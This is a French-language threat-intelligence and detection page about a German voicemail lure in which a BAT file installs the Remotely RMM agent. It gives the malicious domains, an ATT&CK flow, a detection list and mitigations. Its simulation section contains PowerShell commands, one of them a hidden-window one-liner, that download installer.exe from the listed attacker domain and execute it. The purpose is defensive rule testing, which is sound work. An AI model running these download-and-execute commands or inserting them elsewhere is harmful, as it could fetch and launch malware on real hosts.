Suivre
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Les acteurs menaçants hébergent des pages de destination en allemand « messagerie vocale » qui incitent les utilisateurs à télécharger un fichier BAT. Le script exécute un leurre audio bénin tout en installant discrètement l’outil de surveillance à distance Remotely. Une fois déployée, l’agent RMM offre à l’attaquant un accès distant persistant via une infrastructure C2 contrôlée par l’attaquant.
Enquête
Censys a identifié 86 propriétés web compromises sur les domaines *.cadillac.ps distribuant le BAT malveillant. Le script invoque un installateur PowerShell hébergé sur remotely.billbutterworth.com, qui extrait un package ZIP Remotely. L’archive contient les composants de l’agent Remotely et un service qui s’installe sous C:Program FilesRemotely.
Atténuation
Bloquez les domaines *.cadillac.ps et remotely.billbutterworth.com au niveau DNS/proxy. Formez les utilisateurs à ne pas exécuter de fichiers BAT inattendus ou à copier/coller des commandes PowerShell à partir de pages web inconnues. Déployez des contrôles de point de terminaison pour détecter la création de service Remotely et les chemins d’installation suspects ou les outils non signés.
Réponse
Alertez sur la création de Remotely_Service et la présence de Remotely_Agent.exe sous Program Files. Cherchez voicemail.bat et l’activité associée de l’installateur PowerShell. Isolez les hôtes affectés, collectez des artefacts judiciaires, et faites tourner/révoquez toutes les identifications ou les jetons utilisés par l’agent RMM.
graph TB %% Définitions de classes classDef action fill:#99ccff %% Nœuds node_content_injection[« <b>Technique</b> – T1659 Injection de Contenu<br/>Une propriété web compromise diffuse un lien malveillant. »] class node_content_injection action node_initial_user_exec[« <b>Technique</b> – T1204.001 Exécution par l’Utilisateur : Lien Malveillant<br/>La victime clique sur un lien malveillant vers une page de messagerie vocale compromise. »] class node_initial_user_exec action node_cmd_shell[« <b>Technique</b> – T1059.003 Interpréteur de Commandes Windows<br/>Fichier BAT (voicemail.bat) téléchargé et exécuté. »] class node_cmd_shell action node_powershell[« <b>Technique</b> – T1059.001 PowerShell<br/>Le script Install-Remotely.ps1 installe Remotely RMM. »] class node_powershell action node_system_service[« <b>Technique</b> – T1569 Services Système<br/>RMM installé en tant que service Windows (Remotely_Service). »] class node_system_service action node_masquerading[« <b>Technique</b> – T1036 Déguisement & T1036.008 Déguisement du Type de Fichier<br/>BAT présenté comme mise à jour multimédia ; fichiers placés dans Program Files. »] class node_masquerading action node_hide_artifacts[« <b>Technique</b> – T1564 Masquage des Artéfacts<br/>Artéfacts d’installation cachés dans C:\Program Files\Remotely. »] class node_hide_artifacts action node_c2[« <b>Technique</b> – T1102.002 Communication Bidirectionnelle via Service Web & T1071 Protocole de Couche Applicative<br/>Communication HTTPS avec un serveur distant. »] class node_c2 action %% Connexions node_content_injection –>|prend_en_charge| node_initial_user_exec node_initial_user_exec –>|mène_à| node_cmd_shell node_cmd_shell –>|exécute| node_powershell node_powershell –>|installe| node_system_service node_system_service –>|utilise| node_masquerading node_system_service –>|utilise| node_hide_artifacts node_system_service –>|établit| node_c2
Flux d’Attaque
Détections
Téléchargement ou Téléversement via Powershell (via ligne de commande)
Voir
Arrêt Suspect d’un Service Interférant Ransomware (via ligne de commande)
Voir
Exécution de Fichier par Powershell dans un Répertoire Suspect en Utilisant la Politique de Contournement (via ligne de commande)
Voir
IOCs (HashSha256) à détecter : Piège à Messagerie Vocale : Leurre Messagerie Vocale en Allemand Menant à l’Accès à Distance
Voir
IOCs (HashMd5) à détecter : Piège à Messagerie Vocale : Leurre Messagerie Vocale en Allemand Menant à l’Accès à Distance
Voir
Leurre Messagerie Vocale Allemand Mène à l’Installation RMM [Serveur Web]
Voir
Détection d’Exécution de Fichier BAT Messagerie Vocale [Événement Fichier Windows]
Voir
Exécution de Simulation
Prérequis : La Vérification Préliminaire de Télémétrie & de Base doit avoir été validée.
Rationnel : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTP identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés entraîneront un diagnostic erroné.
-
Narrative & Commandes de l’Attaque :
- Livraison de Phishing : L’attaquant envoie un email avec une pièce jointe de leurre de messagerie vocale en allemand (HTML) qui, une fois ouvert, redirige la victime vers
http://bannerbank.cadillac.ps/voicemail.html. - Exécution de la Page de Destination : La page d’accueil héberge un script PowerShell en une ligne qui télécharge et exécute un installateur d’outil de gestion à distance (RMM).
- Création de Processus : Lorsque le navigateur de la victime traite la page, PowerShell est invoqué avec une ligne de commande qui inclut explicitement les deux chaînes que la règle surveille.
- Télémétrie Résultante : Windows enregistre l’ID d’événement 4688 avec une
CommandLinecontenant à la fois “page d’accueil sur le thème de la messagerie vocale” and “bannerbank.cadillac.ps”, satisfaisant ainsi la condition Sigma.
La commande exacte utilisée pour la simulation :
# Exécution malveillante simulée – contient les deux chaînes déclencheuses Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"Write-Host 'page d'accueil sur le thème de la messagerie vocale'; Invoke-WebRequest -Uri 'http://bannerbank.cadillac.ps/installer.exe' -OutFile $env:TEMPinstaller.exe; Start-Process $env:TEMPinstaller.exe`"" - Livraison de Phishing : L’attaquant envoie un email avec une pièce jointe de leurre de messagerie vocale en allemand (HTML) qui, une fois ouvert, redirige la victime vers
-
Script de Test de Régression : Un script PowerShell autonome qui reproduit l’attaque et peut être exécuté sur n’importe quel hôte Windows avec la journalisation requise activée.
<# .SYNOPSIS Simule le leurre de messagerie vocale allemand qui déclenche la règle de détection Sigma. .DESCRIPTION Exécute une ligne de commande PowerShell contenant les deux sous-chaînes requises. #> # Définir les chaînes malveillantes $lureText = "page d’accueil sur le thème de la messagerie vocale" $maliciousDomain = "bannerbank.cadillac.ps" # Construire le script en une ligne qui apparaitra dans la ligne de commande $payload = @" Write-Host '$lureText'; Invoke-WebRequest -Uri 'http://$maliciousDomain/installer.exe' -OutFile $env:TEMPinstaller.exe; Start-Process $env:TEMPinstaller.exe "@ # Lancer PowerShell avec la ligne de commande préparée $psArgs = "-NoProfile -WindowStyle Hidden -Command `"$payload`"" Write-Host "Lancement de la commande PowerShell malveillante..." Start-Process -FilePath "powershell.exe" -ArgumentList $psArgs -PassThru # Optionnel : attendre quelques secondes pour s'assurer de la journalisation Start-Sleep -Seconds 5 -
Commandes de Nettoyage : Supprimez l’installateur téléchargé et tous les processus résiduels.
# Arrêter tout processus d'installateur restant Get-Process -Name "installer" -ErrorAction SilentlyContinue | Stop-Process -Force # Supprimer le fichier installateur temporaire $installerPath = "$env:TEMPinstaller.exe" if (Test-Path $installerPath) { Remove-Item $installerPath -Force Write-Host "Nettoyé $installerPath" }